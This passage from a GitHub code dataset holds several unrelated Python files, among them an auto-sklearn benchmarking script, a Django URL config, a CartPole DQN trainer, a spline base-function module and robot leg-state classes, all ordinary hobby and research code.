\"_comparison_boxplot.png\"))\n","repo_name":"sokovninn/learning-unknown","sub_path":"yolact_vision/visualize_detection_results.py","file_name":"visualize_detection_results.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27077467939","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n====================\nParallel Script\n====================\n\nThis script run autosklearn in parallel so that to be comparable with JAD\n\nSources:\nhttps://github.com/automl/auto-sklearn/blob/master/examples/example_parallel_manual_spawning.py\nhttps://github.com/automl/auto-sklearn/issues/600\nhttps://github.com/automl/auto-sklearn/issues/203\nhttps://github.com/automl/auto-sklearn/issues/712\nhttps://github.com/automl/auto-sklearn/issues/712\n\n\"\"\"\n\n#importing modules\nimport sys\nimport getopt\nimport multiprocessing\nimport shutil\nimport pandas\nimport copy\nimport pickle\nimport glob\nimport time\n\nimport sklearn.model_selection\nimport sklearn.datasets\nimport sklearn.metrics\n\nimport autosklearn.metrics\nfrom autosklearn.classification import AutoSklearnClassifier\nfrom autosklearn.constants import *\nimport warnings\nwarnings.filterwarnings(\"ignore\", \"Mean of empty slice\")\n\n# small constant to avoid the problem reported in \n# https://github.com/automl/auto-sklearn/issues/203\nsmall_constant = 2\n\n# function for spawning sub-processes\ndef get_spawn_classifier(\n X_train, \n y_train,\n dataset_name,\n time_left_for_this_task,\n tmp_folder,\n output_folder,\n ):\n \n # this function is the actual subprocess\n def spawn_classifier(seed):\n \"\"\"Spawn a subprocess.\n\n auto-sklearn does not take care of spawning worker processes. This\n function, which is called several times in the main block is a new\n process which runs one instance of auto-sklearn.\n \"\"\"\n\n # Use the initial configurations from meta-learning only in one out of\n # the four processes spawned. This prevents auto-sklearn from evaluating\n # the same configurations in different processes.\n if seed == small_constant:\n initial_configurations_via_metalearning = 25\n smac_scenario_args = {}\n else:\n initial_configurations_via_metalearning = 0\n smac_scenario_args = {'initial_incumbent': 'RANDOM'}\n\n # Arguments which are different to other runs of auto-sklearn:\n # 1. all classifiers write to the same output directory\n # 2. shared_mode is set to True, this enables sharing of data between\n # models.\n # 3. all instances of the AutoSklearnClassifier must have a different seed!\n # setting up the automl object\n automl = autosklearn.classification.AutoSklearnClassifier(\n time_left_for_this_task=time_left_for_this_task, # sec., how long should this seed fit process run\n tmp_folder=tmp_folder,\n output_folder=output_folder,\n seed=seed,\n initial_configurations_via_metalearning=initial_configurations_via_metalearning,\n smac_scenario_args=smac_scenario_args,\n shared_mode=True, # tmp folder will be shared between seeds\n delete_tmp_folder_after_terminate=False,\n ensemble_size=0, # ensembles will be built when all optimization runs are finished\n )\n \n try:\n \n # fitting the models\n automl.fit(X_train.copy(), y_train.copy(), dataset_name=dataset_name, metric = autosklearn.metrics.roc_auc)\n\n # accessing cv_results_ as described in \n # https://github.com/automl/auto-sklearn/issues/203\n cvRes = automl.cv_results_\n cvRes = pandas.DataFrame.from_dict(cvRes)\n\n # printing the results\n cvRes.to_csv('./tmp/results/' + dataset_name + '/cvRes_' + str(seed) + '.csv')\n \n except:\n \n pass\n \n \n # returning the sub-process\n return spawn_classifier\n\ndef main(argv):\n\t\n # reading the command line\n helpString = 'python python_script_JAD_paper -a -b -t -n '\n try:\n opts, args = getopt.getopt(argv,\"ha:b:t:n:\")\n except getopt.GetoptError:\n print(helpString)\n sys.exit(2)\n\t\n # collecting the arguments\n for opt, arg in opts:\n if opt == '-h':\n print(helpString)\n sys.exit()\n elif opt == '-a':\n training_set = arg\n elif opt == '-b':\n test_set = arg\n elif opt == '-t':\n time_left_for_this_task = int(arg)\n elif opt == '-n':\n n_processes = int(arg)\n\n # starting counting the time\n start_time = time.time()\n\t\t\n # folders\n tmp_folder = './tmp/autosklearn_tmp/' + training_set\n output_folder = './tmp/autosklearn_out/' + training_set\n\t\n # ensuring the folders are empty (?)\n for tmpDir in [tmp_folder, output_folder]:\n try:\n shutil.rmtree(tmpDir)\n except OSError as e:\n pass\n\n # reading the training data\n trainingData = pandas.read_csv(filepath_or_buffer = './tmp/data/' + training_set + '.csv', index_col = False)\n y_train = trainingData['target']\n X_train = trainingData.drop('target', 1)\n\n # reading the test data\n testData = pandas.read_csv(filepath_or_buffer = './tmp/data/' + test_set + '.csv', index_col = False)\n y_test = testData['target']\n X_test = testData.drop('target', 1)\n \n # main block\n try:\n\n # creating the sub-process function \n processes = []\n spawn_classifier = get_spawn_classifier(\n X_train, \n y_train,\n training_set,\n time_left_for_this_task,\n tmp_folder,\n output_folder\n )\n \n # spawning the subprocesses\n for i in range(small_constant, small_constant + n_processes):\n p = multiprocessing.Process(\n target=spawn_classifier,\n args=[i]\n )\n p.start()\n processes.append(p)\n \n # waiting until all processes are done\n for p in processes:\n p.join()\n \n # retrieving the csRes and concatenating in a single data frame\n csvFiles = glob.glob('./tmp/results/' + training_set + '/*.csv')\n cvRes = pandas.read_csv(filepath_or_buffer = csvFiles[0], index_col = 0)\n for csvFile in csvFiles[1:]:\n cvRes_tmp = pandas.read_csv(filepath_or_buffer = csvFile, index_col = 0)\n cvRes = pandas.concat([cvRes, cvRes_tmp], axis=0, sort=False)\n \n # writing the cvRes on file\n cvRes.to_csv('./tmp/results/' + training_set + '/cvRes.csv', index = False)\n \n # building the ensemble\n automl_ensemble = AutoSklearnClassifier(\n time_left_for_this_task=time_left_for_this_task, # sec., how long should this seed fit process run\n delete_tmp_folder_after_terminate=False,\n delete_output_folder_after_terminate=False,\n seed=12345,\n shared_mode=True,\n ensemble_size=50,\n ensemble_nbest=50,\n tmp_folder=tmp_folder,\n output_folder=output_folder\n )\n automl_ensemble.fit_ensemble(\n y_train.copy(),\n task=BINARY_CLASSIFICATION,\n metric=autosklearn.metrics.roc_auc\n )\n \n # building the best model\n automl_bestModel = AutoSklearnClassifier(\n time_left_for_this_task=time_left_for_this_task, # sec., how long should this seed fit process run\n delete_tmp_folder_after_terminate=False,\n delete_output_folder_after_terminate=False,\n shared_mode=True,\n ensemble_size=1,\n ensemble_nbest=1,\n tmp_folder=tmp_folder,\n output_folder=output_folder\n )\n automl_bestModel.fit_ensemble(\n y_train.copy(),\n task=BINARY_CLASSIFICATION,\n metric=autosklearn.metrics.roc_auc\n )\n \n # refitting on the whole dataset\n automl_bestModel.refit(X_train.copy(), y_train.copy())\n automl_ensemble.refit(X_train.copy(), y_train.copy())\n \n # extracting the performances on test set\n automl_bestModel.target_type = 'multilabel-indicator'\n automl_ensemble.target_type = 'multilabel-indicator'\n predictions_bestModel = automl_bestModel.predict_proba(X_test.copy())\n predictions_ensemble = automl_ensemble.predict_proba(X_test.copy())\n \n # saving the results on file\n toSave = pandas.DataFrame({'outcome':y_test})\n toSave['prob_ensemble'] = predictions_ensemble[ : , 0]\n toSave['prob_bestModel'] = predictions_bestModel[ : , 0]\n toSave.to_csv('./tmp/results/' + training_set + '/holdoutRes.csv')\n \n # stopping counting the time\n end_time = time.time()\n \n # saving total time\n total_time = end_time - start_time\n time_file = open('./tmp/results/' + training_set + '/etime.txt',\"w+\")\n tmp = time_file.write('Total time in seconds: %d\\n' % total_time)\n time_file.close()\n \n except Exception as e: \n print(e)\n \n finally:\n \n # removing the tmp results folder\n shutil.rmtree(tmp_folder + '/.auto-sklearn/models')\n\n\n# executing the script\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"GnosisDA/JADBIO-evaluation","sub_path":"code_auto-sklearn/code/python_script_JAD_paper.py","file_name":"python_script_JAD_paper.py","file_ext":"py","file_size_in_byte":8324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17516166985","text":"from django.conf.urls import patterns, url\r\nfrom online import views\r\nimport register.settings\r\n\r\n \r\nurlpatterns = patterns('',\r\n url(r'^$', views.login, name='login'),\r\n url(r'^login/$',views.login,name = 'login'),\r\n url(r'^loginfail/$',views.login,name = 'loginfail'),\r\n url(r'^regist/$',views.regist,name = 'regist'),\r\n url(r'^registfaild/$',views.regist,name = 'regist'),\r\n url(r'^registfaild1/$',views.regist,name = 'regist'),\r\n url(r'^registsuccee/$',views.registsuccee,name = 'registsuccee'),\r\n url(r'^index/$',views.index,name = 'index'),\r\n url(r'^logout/$',views.logout,name = 'logout'),\r\n url(r'^static/(?P.*)$', 'django.views.static.serve',{ 'document_root': register.settings.STATIC_URL }),\r\n)","repo_name":"chenguangxiang/Dragonboard410cProject","sub_path":"Web User Registration and Login System/source/register/online/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"36390678336","text":"from matplotlib import artist\nimport torch\nimport gym\nfrom torch import random\nfrom Agent import Agent\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\ndef train(args):\n env = gym.make('CartPole-v0')\n env._max_episode_steps = args.max_steps\n agent = Agent(4, 2)\n \n rewards = []\n avg_rewards = []\n\n for episode in range(args.episodes):\n state = env.reset()\n\n acc_reward = 0\n done = False\n\n while not done:\n action = agent.get_action(state)\n \n next_state, reward, done, _ = env.step(action)\n\n reward += abs(next_state[0]) * -1\n\n agent.store(state, action, next_state, reward, done)\n \n agent.learn()\n \n\n acc_reward += reward\n state = next_state\n\n rewards.append(acc_reward)\n avg_rewards.append(np.mean(rewards[-100:]))\n \n if not args.quiet:\n print(f' - episode {episode + 1}, reward: {acc_reward}, avg reward: {np.mean(rewards[-100:])}, eps: {agent.epsilon}')\n \n if args.plot:\n plt.plot(avg_rewards)\n plt.show()\n \n if args.save is not None:\n agent.save(args.save)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-q\", \"--quiet\", action=\"store_true\")\n parser.add_argument(\"-p\", \"--plot\", action=\"store_true\")\n parser.add_argument(\"-s\", \"--save\", type=str)\n parser.add_argument(\"-m\", \"--max-steps\", type=int, default=200)\n parser.add_argument(\"-e\", \"--episodes\", type=int, required=True)\n\n args = parser.parse_args()\n\n train(args)","repo_name":"mroghani/DQN-CartPole","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38428555090","text":"#coding=utf-8\n#获取Cookie保存到变量\nimport http.cookiejar\nimport urllib\ncookie = http.cookiejar.CookieJar()\n#声明一个CookieJar对象实例来保存cookie\n#利用urllib库的HTTPCookieProcessor对象来创建cookie处理器\nhandler = urllib.request.HTTPCookieProcessor(cookie)\n#通过handler来构建opener\nopener = urllib.request.build_opener(handler)\n#此处的open方法同urllib的urlopen方法,也可以传入request\nresponse = opener.open('http://www.baidu.com')\nfor item in cookie:\n print(item.name,':',item.value)\n","repo_name":"13661892653/workspace","sub_path":"pyCode/craw/demo3.py","file_name":"demo3.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30709694316","text":"# For two strings s and t, we say \"t divides s\" if\n# and only if s = t + ... + t(i.e., t is concatenated with itself one or more times).\n#\n# Given two strings str1 and str2, return the largest string x such that x divides both str1 and str2.\n#\n# Example 1:\n#\n# Input: str1 = \"ABCABC\", str2 = \"ABC\"\n# Output: \"ABC\"\n# Example 2: Input: str1 = \"ABABAB\", str2 = \"ABAB\"\n# Output: \"AB\"\n# Example 3: Input: str1 = \"LEET\", str2 = \"CODE\"\n# Output: \"\"\ndef gcd(a, b):\n while b:\n a, b = b, a % b\n return a\n\ndef gcd_strings(str1: str, str2: str):\n if str1 + str2 != str2 + str1:\n return \"\"\n divisor = gcd(len(str1), len(str2))\n\n return str2[:divisor]\n\n# from math import gcd\n\n# print(gcd(10, 30))\n\n\nprint(gcd_strings(\"ABABABAB\", \"ABAB\"))\n\n","repo_name":"pradeep-automation/Python-Practice","sub_path":"greatest_common_div_strings.py","file_name":"greatest_common_div_strings.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41748582679","text":"import os\nimport shutil\nfrom typing import List\n\ndef get_subdirs(directory: str) -> List[str]:\n return list(filter(lambda v: os.path.isdir(v), os.listdir(directory)))\n\ndef main():\n # Throw if the folder that we want to use already exists\n if os.path.exists(\"./compiled-folder\"):\n print(\"./compiled-folder exists! Please remove this folder so the program can work properly!\")\n exit(1)\n os.mkdir(\"./compiled-folder\")\n \n # Get all of the folders within the root directory\n file_structure = []\n for root, _, files in os.walk(\".\"):\n if root == \".\": continue\n for name in files:\n file_structure.append(os.path.join(root, name).replace(\"\\\\\", \"/\"))\n\n for src in file_structure:\n # Set up target directory for copying\n tgt = src.split(\"/\"); tgt[1] = \"compiled-folder\"; tgt = \"/\".join(tgt)\n os.makedirs(os.path.dirname(tgt), exist_ok=True)\n if os.path.isfile(tgt):\n # Append data if file already exists\n try:\n sf = open(src, 'r')\n tf = open(tgt, \"a\")\n tf.write(\"\\n\" + sf.read())\n except:\n # Throw and remove tree\n shutil.rmtree(\"./compiled-folder\")\n print(\"Error while appending file data!\")\n exit(1)\n finally:\n # Close files\n sf.close()\n tf.close()\n else:\n # Copy files\n shutil.copy(src, tgt)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Sparib/folder-compiler","sub_path":"folder-compiler.py","file_name":"folder-compiler.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11565822349","text":"from firebase import firebase\r\nfrom kivy.app import App\r\nfrom kivy.uix.label import Label\r\nfrom kivy.clock import Clock\r\nfrom kivy.core.audio import SoundLoader\r\n\r\n\r\n\r\nclass SensorData (Label):\r\n def update (self, *args):\r\n status = firebase.FirebaseApplication('https:REALTIME_DATABASE_URL', None).get('/DATA', None)\r\n self.font_size = ('30sp')\r\n if status == 1:\r\n self.text = \"Thief Spotted!!\"\r\n self.color= 1, 0, 0, 1\r\n sound = SoundLoader.load('beep.wav').play()\r\n else :\r\n self.color = 1, 1, 1, 1\r\n self.text = \"EveryThing Look Fine So Far ..\"\r\n\r\nclass MyApp (App):\r\n def build(self):\r\n latestUpdate = SensorData()\r\n Clock.schedule_interval(latestUpdate.update, 1) #replace here\r\n return latestUpdate\r\n\r\nif __name__ == '__main__':\r\n app = MyApp()\r\n app.run()\r\n","repo_name":"iamabdh/SmartGuard","sub_path":"SmartGuard/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38316347193","text":"from scipy import *\nfrom pylab import * \nimport numpy as np\n\n\n\ndef getBaseFunc(u_real, i):\n \"\"\"\n Method that calculates the basefunction \n\n Parameters\n ----------\n u_real : array of floats, nodes in u_i\n i : The index for a \"hot node\"\n\n Raises\n ------\n Exception \"Wrong input\"\n if the \"hot node\" i is outside the interval of u\n\n Returns\n -------\n basefunction N_i^k, function (x)\n The base function for a given \"hot node\" i\n\n \"\"\"\n # Solves fact that extra knots seems to be needed but are not\n u = u_real.copy()\n u = np.append(u,1)\n \n # Handles the last base function separately (Defines it as 1 in endpoint)\n if i == len(u_real) - 3:\n return lambda x: (x == u_real[-3]) + getBaseFuncRec(u,i)(x)\n \n elif i > (len(u_real) - 3) or i < 0:\n raise Exception(\"Wrong input\")\n\n else:\n return getBaseFuncRec(u,i)\n\n# Recursive algorithm to find base function\ndef getBaseFuncRec(u, i, k = 3):\n \"\"\"\n Recursive method that finds the base function corresponding with \n a certain index in the u-vector\n Parameters \n --------\n u : array of floats, nodes in u_i\n i : integer, the index of the relevant node u_i\n k : integer, the degree of the desired polynomial, is decreased with every iteration \n Returns \n -------\n Function (x)\n The base function as a polynomial of degree k\n \n \"\"\" \n if k == 0:\n if u[i-1] == u[i]:\n return lambda x: 0\n else:\n return lambda x: (x >= u[i-1]) * (x < u[i])\n else:\n if (u[i+k-1] - u[i-1]) == 0:\n factor1 = lambda x: 0\n else:\n factor1 = lambda x: (x - u[i-1])/(u[i+k-1] - u[i-1])\n \n if (u[i+k] - u[i]) == 0:\n factor2 = lambda x: 0\n else:\n factor2 = lambda x: (u[i+k] - x)/(u[i+k] - u[i])\n \n return lambda x: factor1(x) * getBaseFuncRec(u, i, k-1)(x) + factor2(x) * getBaseFuncRec(u, i+1, k-1)(x)\n\n\ndef getCubicSpline(x, u, d):\n \"\"\"\n Uses the deBoor algorithm to create splines\n \n Parameters\n ----------\n x : array of floats, array of floats\n the point(s) containd in u, for which the alogorithm computes a spline\n u : array of floats, length K, nodes in u_i\n d : coordinates corresponding to nodes u_0 to u_K-2 \n Raises\n ------\n Exception \"Wrong input\"\n if any index x lays outside the bounds of u\n Returns\n -------\n (s(z), s(y))\n Tuple with coordinates for point(s) x\n \"\"\"\n \n I = np.array([]) \n # Checks if all points are contained within u\n if (x > u[-3]).any() or (x < u[2]).any():\n raise Exception(\"Wrong input\")\n \n \n # Finds and saves all base functions in array base_functions\n base_functions = np.array([])\n for i in range(len(u)-2): #Changed from len(u) - 1\n base_functions = np.append(base_functions, getBaseFunc(u, i))\n \n # Finds hot intervals\n I = []\n for i in range(len(x)-1):\n for j in range(len(u)):\n if (x[i] >= u[j]) and (x[i] < u[j+1]):\n I.append(j)\n \n\n \n s_z = np.array([])\n s_y = np.array([])\n control_points_z = np.array([])\n control_points_y = np.array([])\n bf_result = np.array([])\n for i in range(len(x)-1):\n control_points_z = np.array([])\n control_points_y = np.array([])\n for j in range(4):\n control_points_z = np.append(control_points_z, d[(I[i]-2) + j][0])\n control_points_y = np.append(control_points_y, d[(I[i]-2) + j][1])\n hot_base_functions = base_functions[I[i]-2 : I[i]+2]\n bf_result = np.array([])\n for bf in hot_base_functions:\n bf_result = np.append(bf_result, bf(x[i]))\n s_z = np.append(s_z, control_points_z @ bf_result)\n s_y = np.append(s_y, control_points_y @ bf_result)\n \n \n #Case x is array of size 1\n if len(I) == 0:\n for i in range(len(u)):\n if (x[0] >= u[i]) and (x[0] < u[i+1]):\n hot_base_functions = base_functions[i-2 : i+2]\n for j in range(4):\n control_points_z = np.append(control_points_z, d[(i-2) + j][0])\n control_points_y = np.append(control_points_y, d[(i-2) + j][1])\n \n for bf in hot_base_functions:\n bf_result = np.append(bf_result, bf(x[0]))\n s_z = control_points_z @ bf_result\n s_y = control_points_y @ bf_result\n \n \n # Last control point is multiplied by 1 in endpoint\n else: \n s_z = np.append(s_z, d[-1][0])\n s_y = np.append(s_y, d[-1][1])\n\n return np.array((s_z, s_y)).T\n\ndef baseFuncSum(x, u):\n \"\"\"\n Returns the sum of all base functions in points x\n Parameters\n ----------\n x : array of floats, points for which the algorithm should work\n u : array of floats, nodes in u_i\n Returns\n -------\n array of floats, sum of all base functions in the given points x\n \"\"\"\n base_functions = np.array([])\n for i in range(len(u)-2):\n base_functions = np.append(base_functions, getBaseFunc(u, i))\n \n result = np.array([])\n for i in range(len(x)):\n sum = 0\n for bf in base_functions:\n sum += bf(x[i])\n result = np.append(result, sum)\n \n return result\n","repo_name":"Edde333/Scipy-Projects","sub_path":"Project 1 - Splines/base_functions.py","file_name":"base_functions.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74381413201","text":"# Читаем файл со всеми русскими словами и сохраняем файл с 5 буквенными словами\nimport sys, os\n\n\ninput_file = os.path.join(sys.path[0], 'singular.txt') # Файл ввода\noutput_file = os.path.join(sys.path[0], 'five_letters_singular.txt') # Файл вывода\n\nwith open(input_file, 'r', encoding='utf-8') as f:\n all_words = f.readlines()\n\nwords_count = 0\nwith open(output_file, 'w', encoding='utf-8') as f:\n for word in all_words:\n word = word.rstrip()\n if len(word) == 5:\n f.write(word + '\\n')\n words_count += 1\nprint(f'Найдено {words_count} слов из 5 букв')","repo_name":"avdivo/5_letters","sub_path":"find_5_letters_words.py","file_name":"find_5_letters_words.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5493163565","text":"\nclass Solution:\n\n def extendPalindrome(self, s: str, leftPointer: int, rightPointer: int, oddPalindrome: bool) -> tuple:\n extensionCount = 1 if oddPalindrome else 2\n while(leftPointer >= 0 and rightPointer < len(s) and s[leftPointer]==s[rightPointer]):\n #we check to see if borders of palindrome can be extended\n leftPointer -= 1\n rightPointer += 1\n extensionCount += 2\n #return (begin, length) of palindrome found\n return (leftPointer + 1, extensionCount)\n\n def longestPalindrome(self, s: str) -> str:\n longestPalindromeBegin = 0\n longestPalindromeLength = 1\n\n for i in range(0, len(s)):\n #compute largest palindrome centered at i (odd length)\n (largestOddBegin, largestOddLength) = self.extendPalindrome(s, i-1, i+1, True)\n if(largestOddLength > longestPalindromeLength):\n longestPalindromeBegin = largestOddBegin\n longestPalindromeLength = largestOddLength\n #compute largest palindrome centered at pair i, i+1 (even length)\n if(i>=1 and s[i]==s[i-1]):\n (largestEvenBegin, largestEvenLength) = self.extendPalindrome(s, i-2, i+1, False)\n if(largestEvenLength > longestPalindromeLength):\n longestPalindromeBegin = largestEvenBegin\n longestPalindromeLength = largestEvenLength\n #now return longest palindrome found\n return s[longestPalindromeBegin:longestPalindromeBegin+longestPalindromeLength]\n ","repo_name":"ArkhamKnightGPC/LeetCodeProblems","sub_path":"5_LongestPalindromicSubstring.py","file_name":"5_LongestPalindromicSubstring.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35273440799","text":"from collections.abc import Sequence\nfrom datetime import datetime\nfrom typing import (\n Any,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n Tuple,\n TypeVar,\n Union,\n)\n\nfrom squad.constants import Leg\nfrom squad.exceptions import StateError\nfrom squad.kinematics.base import BodyParameters\nfrom squad.kinematics.forward import foot_xyz\nfrom squad.kinematics.inverse import leg_thetas\n\nfrom .base import BaseState\n\n\nL = TypeVar(\"L\", bound=\"LegStates\")\nT_LegState = TypeVar(\"T_LegState\", bound=\"LegState\")\n\n\nclass LegState(BaseState):\n \"\"\"\n Leg state data for one leg of the robot.\n \"\"\"\n\n __slots__ = (\n \"_leg\",\n \"_x\",\n \"_y\",\n \"_z\",\n \"_hip_theta\",\n \"_femur_theta\",\n \"_leg_theta\",\n )\n\n def __init__(\n self,\n leg: Leg,\n x: float,\n y: float,\n z: float,\n hip_theta: float,\n femur_theta: float,\n leg_theta: float,\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n self._leg = leg\n self._x = x\n self._y = y\n self._z = z\n self._hip_theta = hip_theta\n self._femur_theta = femur_theta\n self._leg_theta = leg_theta\n\n @property\n def leg(self) -> Leg:\n \"\"\"Leg: The leg with this state object.\"\"\"\n return self._leg\n\n @property\n def x(self) -> float:\n \"\"\"float: The current X-coordinate of the foot.\"\"\"\n return self._x\n\n @property\n def y(self) -> float:\n \"\"\"float: The current Y-coordinate of the foot.\"\"\"\n return self._y\n\n @property\n def z(self) -> float:\n \"\"\"float: The current Z-coordinate of the foot.\"\"\"\n return self._z\n\n @property\n def hip_theta(self) -> float:\n \"\"\"float: The current hip angle for this leg.\"\"\"\n return self._hip_theta\n\n @property\n def femur_theta(self) -> float:\n \"\"\"float: The current femur angle for this leg.\"\"\"\n return self._femur_theta\n\n @property\n def leg_theta(self) -> float:\n \"\"\"float: The current leg angle for this leg.\"\"\"\n return self._leg_theta\n\n def __str_args__(self) -> Tuple[Iterable[Any], Dict[str, Any]]:\n s_args, s_kws = super().__str_args__()\n s_kws[\"x\"] = self._x\n s_kws[\"y\"] = self._y\n s_kws[\"z\"] = self._z\n s_kws[\"hip_theta\"] = self._hip_theta\n s_kws[\"femur_theta\"] = self._femur_theta\n s_kws[\"leg_theta\"] = self._leg_theta\n return s_args, s_kws\n\n def __repr_args__(self) -> Tuple[Iterable[Any], Dict[str, Any]]:\n r_args, r_kws = super().__repr_args__()\n r_kws[\"x\"] = self._x\n r_kws[\"y\"] = self._y\n r_kws[\"z\"] = self._z\n r_kws[\"hip_theta\"] = self._hip_theta\n r_kws[\"femur_theta\"] = self._femur_theta\n r_kws[\"leg_theta\"] = self._leg_theta\n return r_args, r_kws\n\n def __hash_params__(self) -> Tuple[Any, ...]:\n return super().__hash_params__() + (self.leg,)\n\n def update_position(\n self,\n x: float,\n y: float,\n z: float,\n **kwargs: Any,\n ) -> None:\n \"\"\"Updates the leg's state for the given foot position.\n\n Parameters\n ----------\n x : float\n The new X-coordinate of the foot to set.\n y : float\n The new Y-coordinate of the foot to set.\n z : float\n The new Z-coordinate of the foot to set.\n **kwargs : optional\n Any additional parameters to pass to the :obj:`leg_thetas`\n function.\n\n \"\"\"\n self._x = x\n self._y = y\n self._z = z\n self._hip_theta, self._femur_theta, self._leg_theta = leg_thetas(\n self._leg,\n x,\n y,\n z,\n **kwargs,\n )\n self._timestamp = datetime.now()\n\n def update_orientation(\n self,\n hip_theta: float,\n femur_theta: float,\n leg_theta: float,\n **kwargs: Any,\n ) -> None:\n \"\"\"Updates the leg's state for the given servo angles.\n\n Parameters\n ----------\n hip_theta : float\n The new Hip-angle of the leg to set.\n femur_theta : float\n The new Femur-angle of the leg to set.\n leg_theta : float\n The new Leg-angle of the leg to set.\n **kwargs : optional\n Any additional parameters to pass to the :obj:`foot_xyz`\n function.\n\n \"\"\"\n self._hip_theta = hip_theta\n self._femur_theta = femur_theta\n self._leg_theta = leg_theta\n self._x, self._y, self._z = foot_xyz(\n self._leg,\n hip_theta,\n femur_theta,\n leg_theta,\n **kwargs,\n )\n\n def distance(self, other: \"LegState\") -> float:\n super().distance(other)\n return (\n ((self._x - other._x) ** 2)\n + ((self._y - other._y) ** 2)\n + ((self._z - other._z) ** 2)\n ) ** 0.5\n\n @classmethod\n def from_position(\n cls,\n leg: Leg,\n x: float,\n y: float,\n z: float,\n *,\n timestamp: Optional[datetime] = None,\n **kwargs: Any,\n ) -> \"LegState\":\n \"\"\"Creates a new LegState from the given foot position.\n\n Parameters\n ----------\n leg : Leg\n The leg to create the new state object for.\n x : float\n The X-coordinate of the foot to create the new state for.\n y : float\n The Y-coordinate of the foot to create the new state for.\n z : float\n The Z-coordinate of the foot to create the new state for.\n timestamp : datetime, optional\n The timestamp to use for the new state, if any.\n **kwargs : optional\n Additional keyword arguments to pass to the\n :obj:`leg_thetas` function.\n\n Returns\n -------\n LegState\n The leg state requested, initialized from the given foot\n position.\n\n \"\"\"\n t_hip, t_femur, t_leg = leg_thetas(leg, x, y, z, **kwargs)\n return cls(leg, x, y, z, t_hip, t_femur, t_leg, timestamp=timestamp)\n\n @classmethod\n def from_thetas(\n cls,\n leg: Leg,\n hip_theta: float,\n femur_theta: float,\n leg_theta: float,\n *,\n timestamp: Optional[datetime] = None,\n **kwargs: Any,\n ) -> \"LegState\":\n \"\"\"Creates a new LegState from the given servo angles.\n\n Parameters\n ----------\n leg : Leg\n The leg to create the new state object for.\n hip_theta : float\n The Hip-angle of the leg to create the new state for.\n femur_theta : float\n The Femur-angle of the leg to create the new state for.\n leg_theta : float\n The Leg-angle of the leg to create the new state for.\n timestamp : datetime, optional\n The timestamp to use for the new state, if any.\n **kwargs : optional\n Additional keyword arguments to pass to the :obj:`foot_xyz`\n function.\n\n Returns\n -------\n LegState\n The leg state requested, initialized from the given leg\n servo angles.\n\n \"\"\"\n x, y, z = foot_xyz(leg, hip_theta, femur_theta, leg_theta, **kwargs)\n return cls(\n leg,\n x,\n y,\n z,\n hip_theta,\n femur_theta,\n leg_theta,\n timestamp=timestamp,\n )\n\n\nclass LegStates(Sequence[T_LegState], BaseState):\n \"\"\"\n Composite state/wrapper for holding :obj:`LegState` objects.\n \"\"\"\n\n __slots__ = (\"_legs\",)\n\n def __init__(self, *leg_states: T_LegState, **kwargs: Any) -> None:\n self._legs: List[T_LegState] = sorted(leg_states, key=lambda x: x.leg)\n if len(self._legs) != 4:\n raise StateError(\n \"Invalid number of leg states given (requires 4), got:\"\n f\" {len(self._legs)}\"\n )\n elif not all(x.leg == (i + 1) for i, x in enumerate(self._legs)):\n raise StateError(\"Not all legs represented in leg states given\")\n\n if \"timestamp\" not in kwargs or kwargs[\"timestamp\"] is None:\n kwargs[\"timestamp\"] = max(x.timestamp for x in self._legs)\n super().__init__(**kwargs)\n\n @property\n def fl(self) -> T_LegState:\n \"\"\"LegState: State of the front-left leg.\"\"\"\n return self._legs[Leg.FL - 1]\n\n @property\n def fr(self) -> T_LegState:\n \"\"\"LegState: State of the front-right leg.\"\"\"\n return self._legs[Leg.FR - 1]\n\n @property\n def bl(self) -> T_LegState:\n \"\"\"LegState: State of the back-left leg.\"\"\"\n return self._legs[Leg.BL - 1]\n\n @property\n def br(self) -> T_LegState:\n \"\"\"LegState: State of the back-right leg.\"\"\"\n return self._legs[Leg.BR - 1]\n\n def __str_args__(self) -> Tuple[List[Any], Dict[str, Any]]:\n s_args, s_kws = super().__str_args__()\n _ = (s_args.append(x) for x in self._legs)\n return s_args, s_kws\n\n def __repr_args__(self) -> Tuple[List[Any], Dict[str, Any]]:\n r_args, r_kws = super().__repr_args__()\n _ = (r_args.append(x) for x in self._legs)\n return r_args, r_kws\n\n def __iter__(self) -> Iterator[T_LegState]:\n return iter(self._legs)\n\n def __len__(self) -> int:\n return len(self._legs)\n\n def __getitem__(self, leg: Union[int, Leg]) -> T_LegState:\n if isinstance(leg, Leg):\n l_idx = leg.value - 1\n else:\n l_idx = leg\n return self._legs[l_idx]\n\n def __getstate__(self) -> Dict[str, Any]:\n state = super().__getstate__()\n state[\"legs\"] = 